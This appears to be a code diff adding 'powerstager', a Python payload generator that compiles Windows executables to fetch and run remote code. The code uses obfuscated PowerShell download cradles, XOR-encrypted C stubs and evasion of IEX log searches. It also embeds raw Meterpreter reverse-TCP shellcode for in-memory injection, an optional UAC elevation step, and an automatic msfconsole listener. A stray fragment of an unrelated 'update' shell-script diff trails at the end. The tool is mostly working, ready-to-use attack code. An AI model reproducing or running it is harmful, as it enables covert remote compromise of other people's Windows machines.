exploits multiple Windows features such + as its inherit trust of powershell, interpretation of shorthand syntaxes, + code evaluation and more... + + Program dependencies: + * i686-w64-mingw32-gcc ([_CHECK_i686_]) + * x86_64-w64-mingw32-gcc ([_CHECK_x86_64_]) + + Usage: powerstager [options] + + Options: + -h, --help Show this help message and exit. 
(duh) + + Method: + One of these options has to be provided to define the method + -u, --url=URL Payload URL for online staging + -p, --path=PATH Payload path for embedded staging + -m, --meterpreter embedded meterpreter staging (reverse_tcp) + \033[96m--path and --meterpreter will dump\033[0m + \033[96mthe payload to disk temporary\033[0m + + Mandatory: + -o, --output=PATH File output for generated executable + -t, --target=NAME Platform target win32/win64 + + Meterpreter: + Mandatory options if the meterpreter method is selected, otherwise ignored + --lhost=LHOST Listener host IP address (e.g. 13.37.13.37) + --lport=LPORT Listener port (e.g. 4444) + + Optional: + --listener Automatically starts a meterpreter listener + -g, --generate Only outputs the --url ready payload + -e, --use-elevation Implementation of privilage elevation (using UAC) + \033[96melevation only works with --url\033[0m + + Note: + \033[91mAll powershell activity will be logged in Windows event log.\033[0m +""" + +# Placeholder values for powershell blocks with obfuscation techniques +obfuscation = { + "[_OBF_NEW_OBJECT_]" : "&(`G`C`M *w-O*)", + "[_OBF_ADD_TYPE_]" : "&(`G`C`M *d-T*e)", + "[_OBF_SLEEP_]" : "&(`G`C`M sl*p)", + "[_OBF_WEB_CLIENT_]" : { + "text" : "net.webclient", + "escapable" : True, + "string" : True + }, + "[_OBF_DOWNLOAD_STRING_]" : { + "text" : "downloadstring", + "escapable" : True, + "string" : True + }, + "[_OBF_CHAR_]" : { + "text" : "char", + "escapable" : False, + "string" : False + }, + "[_OBF_BYTE_]" : { + "text" : "byte", + "escapable" : False, + "string" : False + }, + "[_OBF_VOID_]" : { + "text" : "void", + "escapable" : False, + "string" : False + }, + "[_OBF_INTPTR_]" : { + "text" : "intptr", + "escapable" : False, + "string" : False + }, + "[_OBF_JOIN_]" : { + "text" : "join", + "escapable" : False, + "string" : False + }, + "[_OBF_BXOR_]" : { + "text" : "bxor", + "escapable" : False, + "string" : False + }, + "[_OBF_SV_]" : { + "text" : "sv", + "escapable" : 
True, + "string" : False + }, + "[_OBF_GV_]" : { + "text" : "gv", + "escapable" : True, + "string" : False + }, + "[_OBF_VALUE_]" : { + "text" : "value", + "escapable" : True, + "string" : True + }, + "[_OBF_LENGTH_]" : { + "text" : "length", + "escapable" : True, + "string" : True + }, + "[_OBF_START_]" : { + "text" : "start", + "escapable" : True, + "string" : False + }, + "[_OBF_TO_STRING_]" : { + "text" : "tostring", + "escapable" : True, + "string" : True + }, + "[_OBF_TO_B64_STRING_]" : { + "text" : "tobase64string", + "escapable" : True, + "string" : True + }, + "[_OBF_UNICODE_]" : { + "text" : "unicode", + "escapable" : True, + "string" : True + }, + "[_OBF_GET_BYTES_]" : { + "text" : "getbytes", + "escapable" : True, + "string" : True + }, + "[_OBF_AS_]" : { + "text" : "as", + "escapable" : False, + "string" : False + }, + "[_OBF_POWERSHELL_]" : { + "text" : "powershell", + "escapable" : True, + "string" : False + }, + "[_OBF_VIRTUAL_ALLOC_]" : { + "text" : "virtualalloc", + "escapable" : True, + "string" : True + }, + "[_OBF_MAX_]" : { + "text" : "max", + "escapable" : True, + "string" : True + }, + "[_OBF_MEMSET_]" : { + "text" : "memset", + "escapable" : True, + "string" : True + }, + "[_OBF_CREATE_THREAD_]" : { + "text" : "createthread", + "escapable" : True, + "string" : True + }, +} + +# Normal C source for decryption and process execution through system() call +c_source = """#include + +int main(int argc, char *argv[]) +{ + int [_VAR_X_]; + char [_VAR_STR_][] = {[_VAL_STR_]}; + char [_VAR_KEY_][] = {[_VAL_KEY_]}; + for ([_VAR_X_] = 0; [_VAR_X_] < sizeof([_VAR_STR_]) / sizeof([_VAR_STR_][0]); [_VAR_X_]++) + { + [_VAR_STR_][[_VAR_X_]] = [_VAR_STR_][[_VAR_X_]] ^ [_VAR_KEY_][[_VAR_X_] % sizeof([_VAR_KEY_])]; + } + + system([_VAR_STR_]); + + return 0; +} +""" + +# C source for XOR decryption and process execution of embedded code through system() call +c_source_embedded = """#define _CRT_SECURE_NO_DEPRECATE +#include +#include + +int main(int argc, char 
*argv[]) +{ + int [_VAR_X_]; + char [_VAR_PATH_][256]; + const char* [_VAR_TEMP_] = getenv("TEMP"); + snprintf([_VAR_PATH_], 255, "%s\\\\[_TMP_FILENAME_]", [_VAR_TEMP_]); + + FILE *[_VAR_FILE_] = fopen([_VAR_PATH_], "wb"); + if ([_VAR_FILE_] == NULL) { exit(1); } + + char [_VAR_STR_EMB_][] = {[_VAL_STR_EMB_]}; + char [_VAR_KEY_EMB_][] = {[_VAL_KEY_EMB_]}; + for ([_VAR_X_] = 0; [_VAR_X_] < sizeof([_VAR_STR_EMB_]) / sizeof([_VAR_STR_EMB_][0]); [_VAR_X_]++) + { + [_VAR_STR_EMB_][[_VAR_X_]] = [_VAR_STR_EMB_][[_VAR_X_]] ^ [_VAR_KEY_EMB_][[_VAR_X_] % sizeof([_VAR_KEY_EMB_])]; + } + + fwrite([_VAR_STR_EMB_], 1, sizeof([_VAR_STR_EMB_]), [_VAR_FILE_]); + fclose([_VAR_FILE_]); + + char [_VAR_STR_STG_][] = {[_VAL_STR_STG_]}; + char [_VAR_KEY_STG_][] = {[_VAL_KEY_STG_]}; + for ([_VAR_X_] = 0; [_VAR_X_] < sizeof([_VAR_STR_STG_]) / sizeof([_VAR_STR_STG_][0]); [_VAR_X_]++) + { + [_VAR_STR_STG_][[_VAR_X_]] = [_VAR_STR_STG_][[_VAR_X_]] ^ [_VAR_KEY_STG_][[_VAR_X_] % sizeof([_VAR_KEY_STG_])]; + } + + system([_VAR_STR_STG_]); + + return 0; +} +""" + +# Fairly obfuscated building blocks for powershell commands +powershell_blocks = { + # The main part of the powershell blocks + "main" : "powershell -wi h -c \"[_OBF_START_] [_OBF_POWERSHELL_][_ELEVATION_] -wi h -a '-wi h -c \"\"[_PS_LOAD_]\"\"'\"", + + # Base64 decoder + "base64decoder" : "([Convert]::[_OBF_TO_B64_STRING_]([Text.Encoding]::[_OBF_UNICODE_].[_OBF_GET_BYTES_]([_PS_LOAD_])))", + + # XOR decryptor for file decryption + "xordecryptor" : "([[_OBF_CHAR_][]](([[_OBF_CHAR_][]][_PS_LOAD_])|%{$[_PS_XOR_I_]=0}{$_-[_OBF_BXOR_]'[_PS_XOR_KEY_]'[$[_PS_XOR_I_]++%[_PS_XOR_KEY_SIZE_]]})-[_OBF_JOIN_]'')", + + # System.Net.WebClient invoker + "webclient" : "([_OBF_NEW_OBJECT_][_OBF_WEB_CLIENT_]).[_OBF_DOWNLOAD_STRING_]([_URL_])", + + # Encoded command block or EC + "ec" : "[_OBF_SV_] [_PS_VAR_1_] [_PS_VAR_C45_A_];[_OBF_SV_] [_PS_VAR_2_] [_PS_VAR_C101_A_];[_OBF_SV_] [_PS_VAR_3_] [_PS_VAR_C99_A_];[_OBF_SV_] [_PS_VAR_4_](((([_OBF_GV_] 
[_PS_VAR_1_]).[_OBF_VALUE_]+[_PS_VAR_C45_B_])-[_OBF_AS_][[_OBF_CHAR_]]).[_OBF_TO_STRING_]()+((([_OBF_GV_] [_PS_VAR_2_]).[_OBF_VALUE_]+[_PS_VAR_C101_B_])-[_OBF_AS_][[_OBF_CHAR_]]).[_OBF_TO_STRING_]()+((([_OBF_GV_] [_PS_VAR_3_]).[_OBF_VALUE_]+[_PS_VAR_C99_B_])-[_OBF_AS_][[_OBF_CHAR_]]).[_OBF_TO_STRING_]());[_OBF_POWERSHELL_]([_OBF_GV_] [_PS_VAR_4_]).[_OBF_VALUE_].[_OBF_TO_STRING_]()[_PS_LOAD_]", + + # Memory injection block + "injection" : "IEX \"`$[_PS_WF_]=[_OBF_ADD_TYPE_] -m '[DllImport(`\"kernel32.dll`\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(`\"kernel32.dll`\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(`\"msvcrt.dll`\")] public static extern IntPtr memset(IntPtr dest, uint src, uint count);' -name 'Win32' -ns Win32Functions -pas;[[_OBF_BYTE_][]]`$[_PS_VAR_PAYLOAD_]=[_PS_PAYLOAD_];`$[_PS_VAR_X_]=`$[_PS_WF_]::[_OBF_VIRTUAL_ALLOC_](0,[Math]::[_OBF_MAX_](`$[_PS_VAR_PAYLOAD_].[_OBF_LENGTH_],0x1000),0x3000,0x40);for(`$[_PS_VAR_I_]=0;`$[_PS_VAR_I_] -le (`$[_PS_VAR_PAYLOAD_].[_OBF_LENGTH_]-1);`$[_PS_VAR_I_]++){[[_OBF_VOID_]]`$[_PS_WF_]::[_OBF_MEMSET_]([[_OBF_INTPTR_]](`$[_PS_VAR_X_].ToInt[_PS_ARCHITECTURE_]()+`$[_PS_VAR_I_]),`$[_PS_VAR_PAYLOAD_][`$[_PS_VAR_I_]],1)};`$[_PS_WF_]::[_OBF_CREATE_THREAD_](0,0,`$[_PS_VAR_X_],0,0,0);[_OBF_SLEEP_]100000\"" +} + +# Payloads prepared for memory injection +powershell_payloads = { + # metasploit stager for meterpreter. 
This also works with vncinjection on W7 (but fails on W10) + "meterpreter" : "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51," + + "0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52," + + "0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0," + + "0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed," + + "0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78," + + "0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48," + + "0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49," + + "0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31," + + "0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1," + + "0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49," + + "0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b," + + "0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59," + + "0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b," + + "0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00," + + "0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5," + + "0x49,0xbc,0x02,0x00,[_LPORT_]," + "[_LHOST_]" + ",0x41,0x54,0x49,0x89,0xe4,0x4c," # << LPORT and LHOST gets declared here as 6 bytes + + "0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01," + + "0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50," + + "0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0," + + "0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10," + + "0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5," + + 
"0x85,0xc0,0x74,0x0c,0x49,0xff,0xce,0x75,0xe5,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5," + + "0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89," + + "0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6," + + "0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31," + + "0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d," + + "0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8," + + "0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff," + + "0xe7", +} + +# Collision list for dynamic variable creation +collision_list = [] + + +# Class for printing and styling text to terminal +class Print(object): + + name_value_list = [] + + @staticmethod + def text(text="", continuous=False): + if continuous: + sys.stdout.write(" " + text) + sys.stdout.flush() + else: + print(" " + text) + return len(text) + + @staticmethod + def info(text="", continuous=False): + return Print.text("\033[94m[i]\033[0m " + text, continuous) + + @staticmethod + def warning(text="", continuous=False): + return Print.text("\033[96m[!]\033[0m " + text, continuous) + + @staticmethod + def status(text="", continuous=False): + return Print.text("\033[94m[*]\033[0m " + text, continuous) + + @staticmethod + def error(text="", continuous=False): + return Print.text("\033[91m[-]\033[0m " + text, continuous) + + @staticmethod + def success(text="", continuous=False): + return Print.text("\033[92m[+]\033[0m " + text, continuous) + + @staticmethod + def add_name_value(name="", value="", func=None): + Print.name_value_list.append({"name": name, "value": value, "func": func}) + + @staticmethod + def name_value_print(): + for line in Print.name_value_list: + (line["func"] if line["func"] is not None else Print.text)(line["name"] + (" " * (len(max(Print.name_value_list, key=lambda x: len(x["name"]))["name"]) - len(line["name"]) + 4)) + ": " + 
line["value"]) + Print.name_value_list = [] + + +# Checks if program is installed and executable +def which(program): + + def is_exe(fpath): + return os.path.isfile(fpath) and os.access(fpath, os.X_OK) + + fpath, fname = os.path.split(program) + if fpath: + if is_exe(program): + return program + else: + for path in os.environ["PATH"].split(os.pathsep): + path = path.strip('"') + exe_file = os.path.join(path, program) + if is_exe(exe_file): + return exe_file + + return None + + +# Integer to binary converter +def binarray(n): + while n: + yield n & 0xff + n = n >> 8 + + +# Creates dynamic variable names while checking for name collisions +def dynamic_variable(): + global collision_list + + holder = "" + + while holder == "" or holder in collision_list: + holder = "_" + "".join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for x in range(random.randint(6, 12))) + + collision_list.append(holder) + return holder + + +# Binary formater for lhost & lport in meterpreter injection +def _lformat(lhost, lport): + try: + lhost = lhost.split(".") + lhost = [int(byte) for byte in lhost] + lhost = [byte for byte in lhost if byte >= 0 and byte <= 255] + lport = int(lport) + if len(lhost) == 4 and lport > 0 and lport <= 65535: + return ",".join(hex(b) for b in (list(binarray(lport))[::-1] + list(binarray(lhost[0])) + list(binarray(lhost[1])) + list(binarray(lhost[2])) + list(binarray(lhost[3])))) + except: + Print.error("There is something wrong with the LHOST and LPORT") + sys.exit(2) + + +# Compiler for c-source +def compile(source, output, target): + + temp_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(10)) + ".c" + + with open(temp_name, "w") as temp_file: + temp_file.write(source) + + if ( + target == "win32" + and (os.system("i686-w64-mingw32-gcc -mwindows -o " + output + " " + temp_name + " && /bin/rm -f " + temp_name) == 0) + ) or ( + target == "win64" + and (os.system("x86_64-w64-mingw32-gcc -mwindows 
-o " + output + " " + temp_name + " && /bin/rm -f " + temp_name) == 0) + ): + Print.add_name_value("File signature", hashlib.md5(open(output, "rb").read()).hexdigest(), Print.info) + Print.add_name_value("Payload generated", output, Print.success) + return + + Print.add_name_value("Failed to generate", output, Print.error) + os.system("/bin/rm -f " + temp_name) + + +# Powershell ready base64 encoder +def ps_base64encode(data): + return base64.b64encode(data.encode("UTF-16LE")).decode("utf-8", "ignore") + + +# Replaces nth occurrence (maybe overkill as the only call is for first occurrence) +def replaceNth(subject, source, target, n): + indices = [index for index in range(len(subject) - len(source) + 1) if subject[index:index + len(source)] == source] + if len(indices) < n: + return subject + subject = list(subject) + subject[indices[n - 1]:indices[n - 1] + len(source)] = target + return ''.join(subject) + + +# Obfuscates powershell code in accordance with some standard rules +def ps_obf(data, top=False, escape_quotes=False): + global obfuscation + + clone = data + for key, value in obfuscation.items(): + if (type(value) is dict): + while clone.count(key) > 0: + sub = list(value["text"]) + + for i in range(len(sub)): + if random.getrandbits(1): + sub[i] = sub[i].upper() + + if (value["escapable"] and value["string"] and not top) or (value["escapable"] and not value["string"]): + if random.getrandbits(1): + if sub[i] in ["a", "b", "f", "n", "r", "t", "v"]: + sub[i] = sub[i].upper() + sub[i] = "`" + sub[i] + + sub = "".join(sub) + + if value["string"] and not top: + sub = "(\"" + sub + "\")" + + # Used inside injection payloads + if escape_quotes: + sub = sub.replace("`", "``") + sub = sub.replace("\"", "`\"") + + clone = replaceNth(clone, key, sub, 0) + else: + clone = clone.replace(key, value) + + return "".join(clone) + + +# Generates main powershell block +def gen_main(load, elevation=False): + global powershell_blocks + + return 
ps_obf(powershell_blocks["main"]).replace( + "[_ELEVATION_]", (" -v runas" if elevation else "") + ).replace( + "[_PS_LOAD_]", load + ) + + +# Generates EC (EncodedCommand) powershell block, with some extra obfuscation totally avoiding "-EC" +# However, I have noticed the powershell engine still interpreting this as -EC... so not 100% stealthy +def gen_ec(load, top=False): + global powershell_blocks + + c45 = random.randint(0, 45) + c101 = random.randint(0, 101) + c99 = random.randint(0, 99) + + return ps_obf(powershell_blocks["ec"], top).replace( + "[_PS_VAR_1_]", dynamic_variable() + ).replace( + "[_PS_VAR_2_]", dynamic_variable() + ).replace( + "[_PS_VAR_3_]", dynamic_variable() + ).replace( + "[_PS_VAR_4_]", dynamic_variable() + ).replace( + "[_PS_VAR_C45_A_]", str(c45) + ).replace( + "[_PS_VAR_C45_B_]", str(45 - c45) + ).replace( + "[_PS_VAR_C101_A_]", str(c101) + ).replace( + "[_PS_VAR_C101_B_]", str(101 - c101) + ).replace( + "[_PS_VAR_C99_A_]", str(c99) + ).replace( + "[_PS_VAR_C99_B_]", str(99 - c99) + ).replace("[_PS_LOAD_]", load) + + +# Generates base64 decoder powershell block +# The idea is that this + EC will simulate an (IEX + webclient) call +# without calling the IEX at all... 
so looking for IEX in the logs won't help you here +def gen_base64_decoder(url): + global powershell_blocks + + return gen_ec( + ps_obf(powershell_blocks["base64decoder"]).replace( + "[_PS_LOAD_]", gen_webclient("+".join("'" + x + "'" for x in url)) + ) + ) + + +# Generates XOR decryptor powershell block +# This is used for all payloads being temporary stored on disk +def gen_xor_decryptor(url, key): + global powershell_blocks + + return ps_obf(powershell_blocks["xordecryptor"]).replace( + "[_PS_LOAD_]", gen_webclient(url) + ).replace( + "[_PS_XOR_I_]", dynamic_variable() + ).replace( + "[_PS_XOR_KEY_]", key + ).replace( + "[_PS_XOR_KEY_SIZE_]", str(len(key)) + ) + + +# Generates webclient powershell block +def gen_webclient(url): + global powershell_blocks + + return ps_obf(powershell_blocks["webclient"]).replace("[_URL_]", url) + + +# Generates memory injection powershell block +# Used for example with injection of a meterpreter stager into memory +def gen_injection(payload, architecture): + global powershell_blocks + + return ps_obf(powershell_blocks["injection"], False, True).replace( + "[_PS_MEMB_]", + dynamic_variable() + ).replace( + "[_PS_VAR_PAYLOAD_]", + dynamic_variable() + ).replace( + "[_PS_WF_]", + dynamic_variable() + ).replace( + "[_PS_VAR_X_]", + dynamic_variable() + ).replace( + "[_PS_VAR_I_]", + dynamic_variable() + ).replace( + "[_PS_ARCHITECTURE_]", + "64" if architecture == "win64" else "32" + ).replace( + "[_PS_PAYLOAD_]", + payload + ) + + +# Generates injection payload powershell block +# Generates injection payloads either from templates or from path +def gen_injection_payload(_ag): + global powershell_payloads + + # Create an empty holder for an embedded payload + payload_embedded = "" + + # Check what to generate + if (("path" in _ag) and (_ag["path"] != "")): + with open(_ag["path"], "r") as _file: + payload_embedded = ps_base64encode(_file.read()) + elif ("meterpreter" in _ag): + payload_embedded = ps_base64encode( + gen_injection( + 
powershell_payloads["meterpreter"].replace( + "[_LPORT_],[_LHOST_]", + _lformat(_ag["lhost"], _ag["lport"]) + ), _ag["target"] + ) + ) + + if ("generate" in _ag): + with open(_ag["output"], "w") as dump: + dump.write(gen_ec(payload_embedded)) + Print.add_name_value("File signature", hashlib.md5(open(_ag["output"], "rb").read()).hexdigest(), Print.info) + Print.success("Payload generated : " + _ag["output"]) + sys.exit() + + return payload_embedded + + +# Generates source +def gen_source(_ag): + global c_source, c_source_embedded + + if (("url" in _ag) and (_ag["url"] != "")): + + val_key = [] + val_str = [ + ord(x) for x in gen_main( + gen_ec( + ps_base64encode( + gen_base64_decoder(_ag["url"]) + ), True + ), "use-elevation" in _ag + ) + ] + + for i in range(len(val_str)): + val_key.append(random.randint(0, 255)) + val_str[i] = val_str[i] ^ val_key[i] + + Print.add_name_value("Payload size", str(len(val_str)) + " bytes", Print.info) + + return c_source.replace( + "[_VAR_STR_]", + dynamic_variable() + ).replace( + "[_VAL_STR_]", + ",".join(str(x) for x in val_str) + ",0" # append \0 for zero termination (0 xor 0 equals 0) + ).replace( + "[_VAR_KEY_]", + dynamic_variable() + ).replace( + "[_VAL_KEY_]", + ",".join(str(x) for x in val_key) + ",0" # append \0 for zero termination (0 xor 0 equals 0) + ).replace( + "[_VAR_X_]", + dynamic_variable() + ) + else: + + # Generate a temporary file name for later use + remote_tmp_file = dynamic_variable() + encryption_key = "".join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for x in range(random.randint(24, 48))) + + Print.add_name_value("Temp file", remote_tmp_file, Print.info) + Print.add_name_value("Encryption key", encryption_key, Print.info) + + val_key = [] + val_str = [ + ord(x) for x in gen_main( + gen_ec( + ps_base64encode( + gen_ec( + gen_xor_decryptor( + "$env:temp+'\\" + remote_tmp_file + "'", + encryption_key + ) + # Remove temp file (note no plus-sign after temp) + + 
(";Remove-Item $env:temp'\\" + remote_tmp_file + "'") + ) + ), True + ) + ) + ] + + val_key_emb = [] + val_str_emb = [ord(x) for x in gen_injection_payload(_ag)] + + for i in range(len(val_str)): + val_key.append(random.randint(0, 255)) + val_str[i] = val_str[i] ^ val_key[i] + + # Initial encryption with generated key + for i in range(len(val_str_emb)): + val_str_emb[i] = val_str_emb[i] ^ ord(encryption_key[i % len(encryption_key)]) + + # Second encryption with stored key + for i in range(len(val_str_emb)): + val_key_emb.append(random.randint(0, 255)) + val_str_emb[i] = val_str_emb[i] ^ val_key_emb[i] + + Print.add_name_value("Payload size", str(len(val_str)) + " bytes", Print.info) + Print.add_name_value("Embedded size", str(len(val_str_emb)) + " bytes", Print.info) + + return c_source_embedded.replace( + "[_VAR_PATH_]", + dynamic_variable() + ).replace( + "[_VAR_TEMP_]", + dynamic_variable() + ).replace( + "[_TMP_FILENAME_]", + remote_tmp_file + ).replace( + "[_VAR_FILE_]", + dynamic_variable() + ).replace( + "[_VAR_STR_STG_]", + dynamic_variable() + ).replace( + "[_VAL_STR_STG_]", + ",".join(str(x) for x in val_str) + ",0" # append \0 for zero termination (0 xor 0 equals 0) when using strings ONLY + ).replace( + "[_VAR_KEY_STG_]", + dynamic_variable() + ).replace( + "[_VAL_KEY_STG_]", + ",".join(str(x) for x in val_key) + ",0" # append \0 for zero termination (0 xor 0 equals 0) when using strings ONLY + ).replace( + "[_VAR_STR_EMB_]", + dynamic_variable() + ).replace( + "[_VAL_STR_EMB_]", + ",".join(str(x) for x in val_str_emb) + ).replace( + "[_VAR_KEY_EMB_]", + dynamic_variable() + ).replace( + "[_VAL_KEY_EMB_]", + ",".join(str(x) for x in val_key_emb) + ).replace( + "[_VAR_X_]", + dynamic_variable() + ) + + +# Print program header in terminal +def print_header(): + Print.text("\033[38;5;160m" + r" ___ __ _ " + "\033[0m") + Print.text("\033[38;5;161m" + r" / _ \_____ _____ _ __/ _\ |_ __ _ __ _ ___ _ __ " + "\033[0m") + Print.text("\033[38;5;162m" + r" / /_)/ 
_ \ \ /\ / / _ \ '__\ \| __/ _` |/ _` |/ _ \ '__|" + "\033[0m") + Print.text("\033[38;5;163m" + r"/ ___/ (_) \ V V / __/ | _\ \ || (_| | (_| | __/ | " + "\033[0m") + Print.text("\033[38;5;164m" + r"\/ \___/ \_/\_/ \___|_| \__/\__\__,_|\__, |\___|_| " + "\033[0m") + Print.text("\033[38;5;130m" + r" _ __ _ _ " + "\033[38;5;164m|___/\033[38;5;130m " + "\033[0m") + Print.text("\033[38;5;131m" + r" | '_ \| | | | " + "\033[0m") + Print.text("\033[38;5;132m" + r" _| |_) | |_| | A payload stager using PowerShell " + "\033[0m") + Print.text("\033[38;5;133m" + r"(_) .__/ \__, | Created by z0noxz " + "\033[0m") + Print.text("\033[38;5;134m" + r" |_| |___/ " + "\033[0m") + + +def main(argv): + global help_notes + + _ag = {} + + print_header() + + help_notes = help_notes.replace("[_CHECK_i686_]", "\033[92mpresent\033[0m" if which("i686-w64-mingw32-gcc") else "\033[91mmissing\033[0m") + help_notes = help_notes.replace("[_CHECK_x86_64_]", "\033[92mpresent\033[0m" if which("x86_64-w64-mingw32-gcc") else "\033[91mmissing\033[0m") + + try: + opts, args = getopt.getopt( + argv, + "hu:p:mo:t:eg", + [ + "help", + "url=", + "path=", + "meterpreter", + "output=", + "target=", + "lhost=", + "lport=", + "use-elevation", + "listener", + "generate", + ] + ) + except getopt.GetoptError as e: + print(help_notes) + Print.error(str(e)) + sys.exit(2) + for opt, arg in opts: + if opt in ("-h", "--help"): + print(help_notes) + sys.exit() + elif opt in ("-u", "--url"): + _ag["url"] = arg + elif opt in ("-p", "--path"): + _ag["path"] = arg + elif opt in ("-m", "--meterpreter"): + _ag["meterpreter"] = arg + elif opt in ("-o", "--output"): + _ag["output"] = arg + elif opt in ("-t", "--target"): + _ag["target"] = arg + elif opt in ("--lhost"): + _ag["lhost"] = arg + elif opt in ("--lport"): + _ag["lport"] = arg + elif opt in ("-e", "--use-elevation"): + _ag["use-elevation"] = arg + elif opt in ("--listener"): + _ag["listener"] = True + elif opt in ("-g", "--generate"): + _ag["generate"] = arg + + 
Print.text("") + + if (not which("i686-w64-mingw32-gcc")) or (not which("x86_64-w64-mingw32-gcc")): + Print.error("mingw does not seem to be installed on your system") + sys.exit(2) + + if (("url" not in _ag) or (_ag["url"] == "")) and (("path" not in _ag) or (_ag["path"] == "")) and ("meterpreter" not in _ag): + Print.error("A method parameter is missing, or empty") + sys.exit(2) + elif not (("url" not in _ag) or (_ag["url"] == "")) and not (("path" not in _ag) or (_ag["path"] == "")) and not ("meterpreter" not in _ag): + Print.error("Only one method parameter is allowed") + sys.exit(2) + elif not (("url" not in _ag) or (_ag["url"] == "")): + Print.add_name_value("URL", _ag["url"], Print.info) + elif not (("path" not in _ag) or (_ag["path"] == "")): + Print.add_name_value("PATH", _ag["path"], Print.info) + elif ("meterpreter" in _ag): + if (("lhost" in _ag) and (_ag["lhost"] != "")) and (("lport" in _ag) and (_ag["lport"] != "")): + Print.add_name_value("Shell listener", _ag["lhost"] + ":" + _ag["lport"], Print.info) + else: + Print.error("LHOST and LPORT must be specified when generating a meterpreter payload") + sys.exit(2) + if ("listener" in _ag) and (_ag["listener"]): + Print.add_name_value("MSF Listener", "MSF listener will open automatically", Print.info) + + if ("output" not in _ag) or (_ag["output"] == ""): + Print.error("'output' parameter is missing, or empty") + sys.exit(2) + else: + Print.add_name_value("Output", _ag["output"], Print.info) + + if ("target" not in _ag) or (_ag["target"] == ""): + Print.error("'target' parameter is missing, or empty") + sys.exit(2) + elif (_ag["target"] == "win32") or (_ag["target"] == "win64"): + Print.add_name_value("Target", _ag["target"].lower(), Print.info) + else: + Print.error("'target' must be either win32 or win64") + sys.exit(2) + + if ("use-elevation" in _ag): + Print.add_name_value("Invoke with elevation", "Yes", Print.info) + Print.warning("- This may trigger the UAC") + + compile(gen_source(_ag), 
_ag["output"], _ag["target"]) + Print.name_value_print() + + ## Last minute addition + ## TODO :: Add better interactivity through 'popen' if possible, else scrap feature + if ("listener" in _ag) and (_ag["listener"]): + Print.text() + Print.info("Note: MSF will stay open after session ends") + Print.status("Opening MSF listener...") + # hardcoded to use x64 meterpreter for now + os.system("msfconsole -x \"use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;exploit\" -q") + +if __name__ == "__main__": + main(sys.argv[1:])
diff --git a/update b/update
old mode 100755
new mode 100644
index d10d56e..e1c1924
--- a/update
+++ b/update
@@ -9,24 +9,69 @@ yellow='\e[1;33m'
 blue='\e[1;34m'
 purple='\e[1;35m'
-ping -c 1 google.com > /dev/null 2>&1
- if [ "$?" != 0 ]
-
+function chknet() {
+echo -e $red "[X] Your Internet is not working correctly!"
+sleep 1
+echo -e $cyan "[*] Checking ...."
+ping -c 1 8.8.4.4 > /dev/null 2>&1
+png="$?"
+ if [ $png == "0" ]
 then
-
- echo -e $red [Internet Connection]: OFFLINE!;
